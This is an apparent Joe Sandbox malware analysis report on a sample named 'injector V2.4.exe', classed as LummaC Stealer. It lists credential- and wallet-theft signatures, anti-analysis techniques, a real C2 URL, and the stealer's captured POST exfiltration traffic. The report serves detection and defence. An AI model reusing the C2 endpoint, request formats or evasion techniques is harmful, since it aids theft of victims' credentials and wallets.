Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
injector V2.4.exe

Overview

General Information

Sample name:injector V2.4.exe
Analysis ID:1561470
MD5:c1b5cae419a07b5bfeb4e958510f8637
SHA1:80c99f320d7b74fb100b51cd98a2ff232e286e63
SHA256:608864a20a91e6fcacefa06046a522a66dbfe45f3f94adfc32ed89ffcae29907
Tags:exeuser-4k95m
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • injector V2.4.exe (PID: 5508 cmdline: "C:\Users\user\Desktop\injector V2.4.exe" MD5: C1B5CAE419A07B5BFEB4E958510F8637)
    • conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • injector V2.4.exe (PID: 5268 cmdline: "C:\Users\user\Desktop\injector V2.4.exe" MD5: C1B5CAE419A07B5BFEB4E958510F8637)
    • injector V2.4.exe (PID: 6564 cmdline: "C:\Users\user\Desktop\injector V2.4.exe" MD5: C1B5CAE419A07B5BFEB4E958510F8637)
  • cleanup
{"C2 url": "https://property-imper.sbs/api", "Build Version": "yau6Na--1285025705"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: injector V2.4.exe PID: 6564JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      Process Memory Space: injector V2.4.exe PID: 6564JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: injector V2.4.exe PID: 6564JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-23T14:11:11.838507+010020283713Unknown Traffic192.168.2.549704104.21.33.116443TCP
          2024-11-23T14:11:13.918642+010020283713Unknown Traffic192.168.2.549705104.21.33.116443TCP
          2024-11-23T14:11:16.241595+010020283713Unknown Traffic192.168.2.549706104.21.33.116443TCP
          2024-11-23T14:11:18.324378+010020283713Unknown Traffic192.168.2.549707104.21.33.116443TCP
          2024-11-23T14:11:20.509084+010020283713Unknown Traffic192.168.2.549708104.21.33.116443TCP
          2024-11-23T14:11:23.015197+010020283713Unknown Traffic192.168.2.549709104.21.33.116443TCP
          2024-11-23T14:11:25.549686+010020283713Unknown Traffic192.168.2.549711104.21.33.116443TCP
          2024-11-23T14:11:30.110285+010020283713Unknown Traffic192.168.2.549725104.21.33.116443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-23T14:11:12.545091+010020546531A Network Trojan was detected192.168.2.549704104.21.33.116443TCP
          2024-11-23T14:11:14.660934+010020546531A Network Trojan was detected192.168.2.549705104.21.33.116443TCP
          2024-11-23T14:11:30.820317+010020546531A Network Trojan was detected192.168.2.549725104.21.33.116443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-23T14:11:12.545091+010020498361A Network Trojan was detected192.168.2.549704104.21.33.116443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-23T14:11:14.660934+010020498121A Network Trojan was detected192.168.2.549705104.21.33.116443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-23T14:11:19.090279+010020480941Malware Command and Control Activity Detected192.168.2.549707104.21.33.116443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-23T14:11:25.563296+010028438641A Network Trojan was detected192.168.2.549711104.21.33.116443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: injector V2.4.exe.6564.4.memstrminMalware Configuration Extractor: LummaC {"C2 url": "https://property-imper.sbs/api", "Build Version": "yau6Na--1285025705"}
          Source: injector V2.4.exeReversingLabs: Detection: 42%
          Source: injector V2.4.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_00418BE3 CryptUnprotectData,4_2_00418BE3
          Source: injector V2.4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49704 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49705 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49706 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49707 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49708 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49711 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49725 version: TLS 1.2
          Source: injector V2.4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_004DC72A FindFirstFileExW,0_2_004DC72A
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_004DC7DB FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_004DC7DB
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_004DC72A FindFirstFileExW,3_2_004DC72A
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_004DC7DB FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_004DC7DB
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov edi, edx4_2_0043D880
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax-43h]4_2_00420970
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi-000000BEh]4_2_0040A10E
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov word ptr [eax], cx4_2_00418BE3
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then movzx eax, byte ptr [ebp+edx+2EBA049Dh]4_2_0040CE5A
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h4_2_00440620
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov edi, esi4_2_00440740
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then lea eax, dword ptr [esp+3Ch]4_2_0040C7A5
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov ecx, ebx4_2_00439040
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov byte ptr [ebx], al4_2_0042C84A
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov edi, eax4_2_0042CD62
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov word ptr [eax], cx4_2_00429F62
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 1B6183F2h4_2_00429813
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov byte ptr [ebx], al4_2_0042C8DC
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov byte ptr [edi], cl4_2_0042D0F6
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov word ptr [eax], cx4_2_004298A8
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then lea edx, dword ptr [ecx+01h]4_2_004298A8
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then add eax, edx4_2_00426959
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 1B6183F2h4_2_00426910
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov byte ptr [ebx], al4_2_0042C918
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov byte ptr [ebx], al4_2_0042C929
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov bx, 0008h4_2_00404930
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then jmp ecx4_2_00404930
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h4_2_004231F0
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then jmp dword ptr [00445ED4h]4_2_0040B989
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then cmp al, 5Ch4_2_00402190
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then movzx eax, byte ptr [esp+esi-40D3E74Fh]4_2_0042A1A2
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000F0h]4_2_0040DA43
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov edx, ecx4_2_0040EA4F
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+6FB81553h]4_2_0041D201
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h4_2_0042BA10
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 1B6183F2h4_2_00439290
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov ecx, edx4_2_00428A9C
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 1B6183F2h4_2_00428A9C
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov edi, esi4_2_00425344
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov word ptr [eax], cx4_2_004298A8
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then lea edx, dword ptr [ecx+01h]4_2_004298A8
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov byte ptr [edx], cl4_2_0042D318
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov edx, ebp4_2_004393D0
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov byte ptr [edx], cl4_2_0042D380
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then movzx edi, byte ptr [eax]4_2_0042E388
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov word ptr [eax], cx4_2_00423450
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]4_2_0042B450
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov byte ptr [edi], al4_2_0041AC64
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov ebx, eax4_2_00405C20
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov ebp, eax4_2_00405C20
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov edx, eax4_2_00440CD0
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov word ptr [eax], cx4_2_004294BD
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov edi, eax4_2_0042CD67
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then movzx eax, word ptr [ecx]4_2_004395E9
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then jmp ecx4_2_0043DDF5
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then jmp dword ptr [00447FC4h]4_2_00427580
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-59BD808Dh]4_2_00427580
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov word ptr [eax], cx4_2_00427580
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then jmp ecx4_2_0043E5A6
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov edx, ecx4_2_0042ADAB
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 1B6183F2h4_2_0042ADAB
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov esi, ebx4_2_00408E00
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then movzx ebx, byte ptr [edx]4_2_00435E10
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then jmp dword ptr [00445ED4h]4_2_0040B626
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-47412FB0h]4_2_0041CED0
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov byte ptr [edi], al4_2_0041CED0
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov ebx, edx4_2_0040BEB1
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+14h]4_2_00428F5D
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov word ptr [eax], cx4_2_00429F62
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov ecx, eax4_2_00422776
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then jmp dword ptr [00447FC4h]4_2_00427774
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov word ptr [eax], cx4_2_00427774
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax+7035CC0Ch]4_2_0041DF00
          Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov esi, ecx4_2_00421F10

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49725 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49707 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49711 -> 104.21.33.116:443
          Source: Malware configuration extractorURLs: https://property-imper.sbs/api
          Source: Joe Sandbox ViewIP Address: 104.21.33.116 104.21.33.116
          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49725 -> 104.21.33.116:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49711 -> 104.21.33.116:443
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: property-imper.sbs
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HFRS7G1FUA8REUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12810Host: property-imper.sbs
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=69CXXKCM4XW3VKJ8X0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15082Host: property-imper.sbs
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TU3BSQD1V57Y1SYAPT6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20578Host: property-imper.sbs
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OCZ8RMO9L20OK5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1251Host: property-imper.sbs
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Z4LE82AH15EL844SF6XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 551200Host: property-imper.sbs
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: property-imper.sbs
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficDNS traffic detected: DNS query: property-imper.sbs
          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
          Source: injector V2.4.exe, 00000004.00000003.2177316206.00000000052D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: injector V2.4.exe, 00000004.00000003.2177316206.00000000052D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: injector V2.4.exe, 00000004.00000003.2294286988.0000000002BA9000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2294509067.0000000002BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microx
          Source: injector V2.4.exe, 00000004.00000003.2177316206.00000000052D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
          Source: injector V2.4.exe, 00000004.00000003.2177316206.00000000052D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: injector V2.4.exe, 00000004.00000003.2177316206.00000000052D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: injector V2.4.exe, 00000004.00000003.2177316206.00000000052D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
          Source: injector V2.4.exe, 00000004.00000003.2177316206.00000000052D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
          Source: injector V2.4.exe, 00000004.00000003.2177316206.00000000052D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: injector V2.4.exe, 00000004.00000003.2177316206.00000000052D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
          Source: injector V2.4.exe, 00000004.00000003.2177316206.00000000052D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
          Source: injector V2.4.exe, 00000004.00000003.2177316206.00000000052D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
          Source: injector V2.4.exe, 00000004.00000003.2134677816.00000000052FB000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134796623.00000000052F8000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134731743.00000000052F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: injector V2.4.exe, 00000004.00000003.2178397811.000000000534E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
          Source: injector V2.4.exe, 00000004.00000003.2178397811.000000000534E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
          Source: injector V2.4.exe, 00000004.00000003.2134677816.00000000052FB000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134796623.00000000052F8000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134731743.00000000052F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: injector V2.4.exe, 00000004.00000003.2134677816.00000000052FB000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134796623.00000000052F8000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134731743.00000000052F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: injector V2.4.exe, 00000004.00000003.2134677816.00000000052FB000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134796623.00000000052F8000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134731743.00000000052F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: injector V2.4.exe, 00000004.00000003.2178397811.000000000534E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
          Source: injector V2.4.exe, 00000004.00000003.2178397811.000000000534E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
          Source: injector V2.4.exe, 00000004.00000003.2134677816.00000000052FB000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134796623.00000000052F8000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134731743.00000000052F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: injector V2.4.exe, 00000004.00000003.2134677816.00000000052FB000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134796623.00000000052F8000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134731743.00000000052F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: injector V2.4.exe, 00000004.00000003.2134677816.00000000052FB000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134796623.00000000052F8000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134731743.00000000052F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: injector V2.4.exe, 00000004.00000003.2178397811.000000000534E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
          Source: injector V2.4.exe, 00000004.00000003.2241245492.0000000002C1C000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2178099039.00000000052C4000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2134375818.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2202521642.0000000002C08000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000002.2295771988.0000000002C1C000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2176641373.00000000052C1000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2176971631.00000000052C3000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2273721386.0000000002C1C000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000002.2295589364.0000000002BA9000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2294286988.0000000002BA9000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2273721386.0000000002C0D000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2223528130.00000000052C1000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2199575933.00000000052C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/
